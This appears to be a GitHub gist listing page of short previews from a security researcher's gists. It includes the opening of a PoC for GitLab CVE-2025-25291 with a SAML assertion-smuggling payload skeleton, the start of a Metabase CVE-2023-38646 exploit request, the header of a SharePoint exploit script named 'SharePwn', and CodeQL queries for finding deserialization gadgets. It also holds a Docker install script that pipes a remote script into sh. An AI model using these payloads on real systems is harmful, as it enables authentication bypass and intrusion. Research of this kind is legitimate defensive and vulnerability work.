testanull

## Microsoft SharePoint setup guide.md

      
              1 file
            
          
              1 fork
            
          
                0 comments
              
            
              3 stars
            
          
                testanull
                / Microsoft SharePoint setup guide.md
            
            
              Last active
              April 3, 2025 09:23
            
              
                Microsoft SharePoint setup guide
              
          
    Follow by MS guide:

https://learn.microsoft.com/en-us/sharepoint/install/install-sharepoint-server-2016-on-one-server
https://learn.microsoft.com/en-us/sharepoint/install/account-permissions-and-security-settings-in-sharepoint-server-2016

Server setup check list


Server OS: Windows Server 2022 Datacenter Evaluation
 Update windows
 Rename computer
 Config DNS before join Domain

 Domain DNS server, example: 192.168.133.134


 Public DNS server, example: 8.8.8.8


## poc-gitlab-CVE-2025-25291.py
import base64
import urllib.parse

SKELETON_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xml SYSTEM 'x" ><!--'>
FAKE_ASSERTION
<![CDATA[-->
REAL_ASSERTION
<!--]]>--></saml2p:Response>
"""

## ilspy_for_diffing.patch
diff --git a/ICSharpCode.Decompiler/CSharp/OutputVisitor/CSharpOutputVisitor.cs b/ICSharpCode.Decompiler/CSharp/OutputVisitor/CSharpOutputVisitor.cs
index a462ccb9f..5a6722e13 100644
--- a/ICSharpCode.Decompiler/CSharp/OutputVisitor/CSharpOutputVisitor.cs
+++ b/ICSharpCode.Decompiler/CSharp/OutputVisitor/CSharpOutputVisitor.cs
@@ -566,7 +566,20 @@ protected virtual void WriteMethodBody(BlockStatement body, BraceStyle style, bo

                protected virtual void WriteAttributes(IEnumerable<AttributeSection> attributes)
                {
-                       foreach (AttributeSection attr in attributes)
+                       var l = attributes.ToList();

## csharp_edge_example.ql
/**
 * @kind path-problem
 */

import csharp

class StartMethod extends Getter {
StartMethod() { getName() = "get_Name" }
}

## csharp_object_dataprovider.ql
/**
 * @kind path-problem
 */

import csharp

class ODPSetter extends Setter {
  ODPSetter() {
    getDeclaringType().getName() = "ObjectDataProvider" and
    getName() = "set_ObjectInstance"

## java_graph1.ql
/**
 * @kind path-problem
 */

import java

class CustomSetterMethod extends Method {
  CustomSetterMethod() {
    getName().matches("set%") and
    not getName().length() = 3 and

## prepare_ubuntu_template.sh
# All commands will be executed on a Proxmox host
sudo apt update -y && sudo apt install libguestfs-tools -y
wget https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.img
# Install qemu-guest-agent on the image. Additional packages can be specified by separating with a comma.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --install qemu-guest-agent
# Read and set root user password from file.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --root-password file:password_root.txt
# Create an additional user.
sudo virt-customize -a jammy-server-cloudimg-amd64.img --run-command "useradd -m -s /bin/bash myuser"
# Set password for that user.

## SharePwn_public.py
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯

## install.sh
#!/bin/bash
sudo su
wget -qO- https://get.docker.com/ | sh
COMPOSE_VERSION=`git ls-remote https://github.com/docker/compose | grep refs/tags | grep -oE "[0-9]+\.[0-9][0-9]+\.[0-9]+$" | sort --version-sort | tail -n 2 | head -n 1`
sudo sh -c "curl -L https://github.com/docker/compose/releases/download/v${COMPOSE_VERSION}/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose"
sudo chmod +x /usr/local/bin/docker-compose

# You're good to go, no more 404 not found!

## cve-2023-38646_poc.txt
POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Content-Length: 416
Accept: application/json
Content-Type: application/json
User-Agent: Mozilla/5.0
Connection: close

{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
"subprotocol":"h2",
	import base64
	import urllib.parse

	SKELETON_PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE xml SYSTEM 'x" ><!--'>
	FAKE_ASSERTION
	<![CDATA[-->
	REAL_ASSERTION
	<!--]]>--></saml2p:Response>
	"""
	diff --git a/ICSharpCode.Decompiler/CSharp/OutputVisitor/CSharpOutputVisitor.cs b/ICSharpCode.Decompiler/CSharp/OutputVisitor/CSharpOutputVisitor.cs
	index a462ccb9f..5a6722e13 100644
	--- a/ICSharpCode.Decompiler/CSharp/OutputVisitor/CSharpOutputVisitor.cs
	+++ b/ICSharpCode.Decompiler/CSharp/OutputVisitor/CSharpOutputVisitor.cs
	@@ -566,7 +566,20 @@ protected virtual void WriteMethodBody(BlockStatement body, BraceStyle style, bo

	protected virtual void WriteAttributes(IEnumerable<AttributeSection> attributes)
	{
	- foreach (AttributeSection attr in attributes)
	+ var l = attributes.ToList();
	/**
	* @kind path-problem
	*/

	import csharp

	class StartMethod extends Getter {
	StartMethod() { getName() = "get_Name" }
	}
	/**
	* @kind path-problem
	*/

	import csharp

	class ODPSetter extends Setter {
	ODPSetter() {
	getDeclaringType().getName() = "ObjectDataProvider" and
	getName() = "set_ObjectInstance"
	/**
	* @kind path-problem
	*/

	import java

	class CustomSetterMethod extends Method {
	CustomSetterMethod() {
	getName().matches("set%") and
	not getName().length() = 3 and
	# All commands will be executed on a Proxmox host
	sudo apt update -y && sudo apt install libguestfs-tools -y
	wget https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.img
	# Install qemu-guest-agent on the image. Additional packages can be specified by separating with a comma.
	sudo virt-customize -a jammy-server-cloudimg-amd64.img --install qemu-guest-agent
	# Read and set root user password from file.
	sudo virt-customize -a jammy-server-cloudimg-amd64.img --root-password file:password_root.txt
	# Create an additional user.
	sudo virt-customize -a jammy-server-cloudimg-amd64.img --run-command "useradd -m -s /bin/bash myuser"
	# Set password for that user.
	# -- coding: utf-8 --
	import hashlib
	import base64
	import requests, string, struct, uuid, random, re
	import sys
	from collections import OrderedDict
	from sys import version
	from urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
	# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
	#!/bin/bash
	sudo su
	wget -qO- https://get.docker.com/ \| sh
	COMPOSE_VERSION=`git ls-remote https://github.com/docker/compose \| grep refs/tags \| grep -oE "[0-9]+\.[0-9][0-9]+\.[0-9]+$" \| sort --version-sort \| tail -n 2 \| head -n 1`
	sudo sh -c "curl -L https://github.com/docker/compose/releases/download/v${COMPOSE_VERSION}/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose"
	sudo chmod +x /usr/local/bin/docker-compose

	# You're good to go, no more 404 not found!
	POST /api/setup/validate HTTP/1.1
	Host: localhost:3000
	Content-Length: 416
	Accept: application/json
	Content-Type: application/json
	User-Agent: Mozilla/5.0
	Connection: close

	{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{
	"subprotocol":"h2",